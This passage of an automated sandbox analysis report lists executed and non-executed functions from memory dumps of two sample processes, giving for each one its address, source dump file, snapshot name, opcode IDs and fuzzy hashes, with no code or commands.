                                                                      Function 00007FFD9B870C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fb7fd172c729c888a9727becae635bcd939f81c991118cdf083ce6a2a717ebb
                                                                      • Instruction ID: a5cc05785274ab101666d3b96c9c01f7e3a70e8c75803efd5814e677bc69056b
                                                                      • Opcode Fuzzy Hash: 2fb7fd172c729c888a9727becae635bcd939f81c991118cdf083ce6a2a717ebb
                                                                      • Instruction Fuzzy Hash: CD01D631E1E38D8FEB16DBA888A419C7FB0EF46718F1641F7D044DB1A2D53467459740
                                                                      Function 00007FFD9B870C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ebb2867cee1c3e7d7d651d786426f504ee5b9126a0bd9459b2febd2dbb24dc4
                                                                      • Instruction ID: 12e7a0730677d6fbda1e461bc493376a85332ccb966e0903924c255147bfda66
                                                                      • Opcode Fuzzy Hash: 9ebb2867cee1c3e7d7d651d786426f504ee5b9126a0bd9459b2febd2dbb24dc4
                                                                      • Instruction Fuzzy Hash: 0D01D430E1E38D8FEB22DBA888A459C7FB0EF5A708F1541F7D044CB2A2D9386B449741
                                                                      Function 00007FFD9B871C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: cf756a4313ca9609d7476571fb01482e80ebde9a5924014004ab1ebaf68ab6ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: D6F08130B5940E8AEBB4F794C8A47B87362FB88715F0502B9C00DD35A1DE386A819B40
                                                                      Function 00007FFD9B870B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d8133f01992a82599f02521c6ee9b0201f29d9395309d85a0908bcfce3d6e7d
                                                                      • Instruction ID: 14dda5f87b46aa8bdd00003060ae2c8ad149312ea4311db087b2b8b14e0c6a48
                                                                      • Opcode Fuzzy Hash: 1d8133f01992a82599f02521c6ee9b0201f29d9395309d85a0908bcfce3d6e7d
                                                                      • Instruction Fuzzy Hash: 87F0E53571E649CFC3459B79DC999E83B60FB87219B9614FAD08ACB463C220086ECB50
                                                                      Function 00007FFD9B871CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: 8fc3552ae364ccddc2dc14711675b3daef43bdc1c68edb1c81f1fbc1702a16ee
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 62F03020F1D40E8AEBB0E798C8A46B83352EF89B19F5542B5C00DA36F1DD28BA459640
                                                                      Function 00007FFD9B872528 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1458dd140310f0102bc5c1b8dbdb39ba02d5820eed3d262e704a736abf25b83d
                                                                      • Instruction ID: 49f076acd261799b01b4fc78f54d7a5c91795e77643277aedbe5958c1f722809
                                                                      • Opcode Fuzzy Hash: 1458dd140310f0102bc5c1b8dbdb39ba02d5820eed3d262e704a736abf25b83d
                                                                      • Instruction Fuzzy Hash: 1EF0A021F0940A0BF7A8AB9484B51B823D2DF99348F050070D40CD36D7CD186A1262C2
                                                                      Function 00007FFD9B8742E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b52957b0929edf910348d80a75bb3ab3261250e6544ffbd145c48a824d11ac38
                                                                      • Instruction ID: 0384e70d1bdf12454a03868191d9c709dfa6de6a8e7b818aa28dae609a02c03d
                                                                      • Opcode Fuzzy Hash: b52957b0929edf910348d80a75bb3ab3261250e6544ffbd145c48a824d11ac38
                                                                      • Instruction Fuzzy Hash: 35F02230518A1C8FCF98DB08C495EE9B7F1FB68305F154599914AE7260CB31AA84CF85
                                                                      Function 00007FFD9B872AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 52b2da57830af3a3090070a01d601c1c0263bc3756c1460aed8bb1e5bd7dd5cd
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: D6E01270E1D11A46FBA4A794D8A17F9A2A0DB98304F5110B8D50ED33D1CD38AF81AA45
                                                                      Function 00007FFD9B8706A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca193384731fc67af9d0e5cd18f38177077dc3cba6498696c5cce9142c9e3319
                                                                      • Instruction ID: c980fade891a65e941bd2bbcf279ba398f2ccf4cf335fd19fbe8b1a715bbcaa3
                                                                      • Opcode Fuzzy Hash: ca193384731fc67af9d0e5cd18f38177077dc3cba6498696c5cce9142c9e3319
                                                                      • Instruction Fuzzy Hash: BBC01200F2B60E00EC20B3AA98B20ACA101EBCCA18FD20032C108820E1984D22852146
                                                                      Function 00007FFD9B871310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: cd5760c2ae95f87fcc95cdf6791b9678469e7a903c86fb19c88198c582bb6167
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: 1FC08C3051180C8FC908EB28C88480433A0FB0D305BC20090E009C7270E229DDC2C740
                                                                      Function 00007FFD9B874E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 39b1af467fd883c1311424cf84b9f32533b593fdc79371b8d4dd98283cc71842
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: F3C08CA1E2820985F724D6A0486A1AAB381CF88224F628672809DA74A5EE2856027280
                                                                      Function 00007FFD9B8706C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: 9cd61b59201651ee5a28026e7347c38e6fbd96af988442158d0a40ddde9f2cd0
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: D9B01200E6740F00E82473FB08E20A4B040DB4C108FC20070D40D410D1984D12942242

                                                                      Non-executed Functions

                                                                      Function 00007FFD9B8709B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.3154460202.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_7ffd9b870000_EQdhBjQw4G.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 61de89c884e4c676ef6b4e1bf9e5d610d3508d7d0b54d4526d247bde9ba5d116
                                                                      • Instruction ID: ebbaecbe1b6dcfa35270ef7ada9cca0f603ee56e2e75a393f018b89fd7e7ea8d
                                                                      • Opcode Fuzzy Hash: 61de89c884e4c676ef6b4e1bf9e5d610d3508d7d0b54d4526d247bde9ba5d116
                                                                      • Instruction Fuzzy Hash: 4541A497B1D03699E21F33FD79698ED5B48CF8523CB0846B7E05D8B0D79C486086A2E5

                                                                      Executed Functions

                                                                      Function 00007FFD9B8B09AE Relevance: 1.2, Instructions: 1200COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8b0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16eef2e7953cae2852ca0f3e4099437e1b9fc60bd069edfeea3e2b0cc6e0a9a3
                                                                      • Instruction ID: d97814d2383ad53e7037011776f356015c9d4d5885af071c4b1c10ef9cbb7487
                                                                      • Opcode Fuzzy Hash: 16eef2e7953cae2852ca0f3e4099437e1b9fc60bd069edfeea3e2b0cc6e0a9a3
                                                                      • Instruction Fuzzy Hash: F682E761B1995E4FEBA8EB6894A17B473D2FFA8340F1505B9D00DC32D7DD24BD828B81
                                                                      Function 00007FFD9B8B1029 Relevance: .9, Instructions: 878COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8b0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96aadf26390f7bd2000605476c263eeef72ca7223349540d45ade362691d7741
                                                                      • Instruction ID: 9e56974542edd617b6f1d6e6435cbd99d3413155e5c0d234182507fa091f2874
                                                                      • Opcode Fuzzy Hash: 96aadf26390f7bd2000605476c263eeef72ca7223349540d45ade362691d7741
                                                                      • Instruction Fuzzy Hash: C552B871B1995E4FEBA8EB6894A16B473D2FFA8300F1505B9D01DC72D6DE34BD428B80
                                                                      Function 00007FFD9B8D1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ae6c236157751381bad7e62e5d308284f93b9f1234f8d9201cb13836b7ae4f8
                                                                      • Instruction ID: 3fd5b58ff3826d84bc505d6f34f937c6b98a9ff17a12c5be9432941d9720d09c
                                                                      • Opcode Fuzzy Hash: 4ae6c236157751381bad7e62e5d308284f93b9f1234f8d9201cb13836b7ae4f8
                                                                      • Instruction Fuzzy Hash: A2B1AD21B6D69A0BE32DAB6C48920B973C1EFD6309B15877ED8DFC3457D928E50782C1
                                                                      Function 00007FFD9B8A0D78 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 376c240de288d1c2c02c54f95f0c5127f57b9c433dd6df0533df9dfaa8b27bb2
                                                                      • Instruction ID: 95eb85bda30ef56002fb71d4a8ff77b308546b3528c0d788f08a043773d45ab3
                                                                      • Opcode Fuzzy Hash: 376c240de288d1c2c02c54f95f0c5127f57b9c433dd6df0533df9dfaa8b27bb2
                                                                      • Instruction Fuzzy Hash: 3291D075A19A8D8FE78ADF688869BA8BFE1FB9A300F4001BAD04DD72D6DB741411C740
                                                                      Function 00007FFD9B8DAC83 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C7
                                                                      • API String ID: 0-2279091541
                                                                      • Opcode ID: e279ee9e2bdc6c9a499750a02e872e88cad036a6c011cc0188d3b6ad56afed70
                                                                      • Instruction ID: e0a925a32e947d20a3c56e7228d52e45b37dd8e2a4af4a1d496d4e17e70baa4c
                                                                      • Opcode Fuzzy Hash: e279ee9e2bdc6c9a499750a02e872e88cad036a6c011cc0188d3b6ad56afed70
                                                                      • Instruction Fuzzy Hash: 0A210651B1A94E6FE3A897A844A56B82695EFDC320FA503BAD10DC71F7DD3879424340
                                                                      Function 00007FFD9B8CA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8c3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: 0621247429393c06a7d66208533876d8b5cf7ce5fb3c325deb969e03fd838b5e
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 74118231A1CB588FDB64EF18880526AB7E1FB9C711F16453ED489E3264CB34B9018B83
                                                                      Function 00007FFD9B8D1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: a386b0ee6a532ecb580c8332f31c0689e3c05d5c9452291cae224119acc7e121
                                                                      • Instruction ID: 544d44b1d0a3804316aba304a0841cfd7b72e7414fad1d69450536517b819ca8
                                                                      • Opcode Fuzzy Hash: a386b0ee6a532ecb580c8332f31c0689e3c05d5c9452291cae224119acc7e121
                                                                      • Instruction Fuzzy Hash: 42119D2150F3C54FDB53A77488289957FA0AF83611B0A83EFD0C9CF0B3DA69494AC712
                                                                      Function 00007FFD9B8DA0C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 5e907d410134e403a50c3c37836a21def9ecac7b4d188bfb652857d9e9bfe1b4
                                                                      • Instruction ID: bd7e420140da4cabf1f67926bed7bb82d9e0d4b15ff5af45356fc2cc2de12cd5
                                                                      • Opcode Fuzzy Hash: 5e907d410134e403a50c3c37836a21def9ecac7b4d188bfb652857d9e9bfe1b4
                                                                      • Instruction Fuzzy Hash: FDF0A96160F3C44FCB1AAA3488288047FA0EE6B21034A42EFC085CB1A3EA288885C701
                                                                      Function 00007FFD9B8D1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 6eba70586641b07d5c48eb6705b70b2c89ec711fafa3ac1a87bad4aea6d5612f
                                                                      • Instruction ID: d5a490cdab22af2cb825ffc9cebed87e0c8ce5dedef518e05dce2a150c32476e
                                                                      • Opcode Fuzzy Hash: 6eba70586641b07d5c48eb6705b70b2c89ec711fafa3ac1a87bad4aea6d5612f
                                                                      • Instruction Fuzzy Hash: B8E06D2164E3C04FCB16EB3888688557F60AE6720174A42EEC086CF1A3EA2D888AC711
                                                                      Function 00007FFD9B8DA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: d13189197593f158db8a2b1db039196a84c76173c2d3ec3c52f205fe43a48812
                                                                      • Instruction ID: 8f7761da872ac250aa2c4204bdbcd9e3bfb228db942a3ae7cb9b43dd60021348
                                                                      • Opcode Fuzzy Hash: d13189197593f158db8a2b1db039196a84c76173c2d3ec3c52f205fe43a48812
                                                                      • Instruction Fuzzy Hash: 5BE06D6164E7C44FCB1AEA748869454BFA0EF6B21174A42EFC045CF1A7EA2DCC85C701
                                                                      Function 00007FFD9B8D2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: a03a75901e3aa471f635497060e54033570d10c1a3177cc4b64ce42e74ece193
                                                                      • Instruction ID: 18b50f0a665cbdec18fee2282260a6d788bfad0e4ad21fd4cbd96debca9f80c8
                                                                      • Opcode Fuzzy Hash: a03a75901e3aa471f635497060e54033570d10c1a3177cc4b64ce42e74ece193
                                                                      • Instruction Fuzzy Hash: 45E06D6164E7C44FC71AEA788869854BFA0EF6720174A52EFC045CF1A7EA2D8889CB01
                                                                      Function 00007FFD9B8C57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8c3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 8200b66f6e840a501a2231d74d3e66a55e32524aa611378022c748edc95c725a
                                                                      • Instruction ID: 8051b4800435a06609103da3027bafd2b2fbe75e33afc81ab9439bc8ebc922eb
                                                                      • Opcode Fuzzy Hash: 8200b66f6e840a501a2231d74d3e66a55e32524aa611378022c748edc95c725a
                                                                      • Instruction Fuzzy Hash: 7CE0923060A7C14FCB1AAB748468454BF70EF6720174A42EEC056CB1A3DB2DC886CB01
                                                                      Function 00007FFD9B8DA589 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: a3f4bc43db285fd8922b277463281d07b6eb66e56817f375ddc6c5a4c6a4e2d1
                                                                      • Instruction ID: c55996452afbae73296325fef64d53e489a754a1f8c3033d375e33b6fd98a45c
                                                                      • Opcode Fuzzy Hash: a3f4bc43db285fd8922b277463281d07b6eb66e56817f375ddc6c5a4c6a4e2d1
                                                                      • Instruction Fuzzy Hash: B1E01A6554B3C44FCB16AB7588A58543FB0EE6B71078A41EEC185CF1B3EA2DD88AC701
                                                                      Function 00007FFD9B8C9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8c3000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 0ad5b91c67a822deee8326b39880fc8a3b93146e92ff060f9b1f559e1f237f6f
                                                                      • Instruction ID: 233e32af005589b542636b24dd9d8b7c9580197b3923e42fb88f7a1609c19aa8
                                                                      • Opcode Fuzzy Hash: 0ad5b91c67a822deee8326b39880fc8a3b93146e92ff060f9b1f559e1f237f6f
                                                                      • Instruction Fuzzy Hash: D3E0E5B154F3C44FCB1AAB7488698557FA0AE6B21078A41EFC185CB1B3E62DD949C701
                                                                      Function 00007FFD9B8D7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 6959f71471f02fc89976746bffbd89fa0df64b87f94bda14f1af7c46f78fd427
                                                                      • Instruction ID: 80cabd91e7e5493a1d68b5d410c1636a54c65bd89d729dde39ccdd4f92069b07
                                                                      • Opcode Fuzzy Hash: 6959f71471f02fc89976746bffbd89fa0df64b87f94bda14f1af7c46f78fd427
                                                                      • Instruction Fuzzy Hash: 1BE01A7154E3C44FCB06AB7488699453F609E6B21178B41DEC08ACF1B3D62E8949C701
                                                                      Function 00007FFD9B8D1C79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
